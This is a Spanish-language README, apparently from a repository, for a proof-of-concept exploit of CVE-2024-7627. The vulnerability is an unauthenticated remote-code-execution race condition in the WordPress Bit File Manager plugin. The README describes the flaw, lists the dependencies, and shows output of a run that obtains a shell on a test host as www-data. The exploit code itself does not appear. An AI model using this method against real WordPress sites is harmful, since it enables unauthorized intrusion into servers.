
Prueba de concepto de exploit para CVE-2024-7627, una vulnerabilidad de ejecución remota de código no autenticada en el plugin Bit File Manager de WordPress. Automatiza la extracción de nonce, la explotación de condiciones de carrera y proporciona una shell inversa interactiva.
Este repositorio contiene un exploit de prueba de concepto (PoC) para CVE-2024-7627, una vulnerabilidad crítica de Ejecución Remota de Código (RCE) no autenticada en el plugin de WordPress Bit File Manager (versiones 6.0 – 6.5.5).
Cuando la característica Guest User Read está habilitada, el plugin expone una condición de carrera dentro de la función checkSyntax.
Esta función escribe un archivo PHP temporal en /wp-content/uploads/ antes de la validación, lo que permite a los atacantes solicitar el archivo y ejecutar comandos arbitrarios del sistema.
requests, aiohttp, asyncio, beautifulsoup4Instala las dependencias:
pip install requests aiohttp beautifulsoup4
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: 65a1d91c63
[*] Getting a random file hash...
[+] Starting interactive shell. Type 'exit' to quit.
lab-shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
lab-shell> uname -a
Linux victim-wp 5.15.0-78-generic #85-Ubuntu SMP x86_64 GNU/Linux
lab-shell> whoami
www-data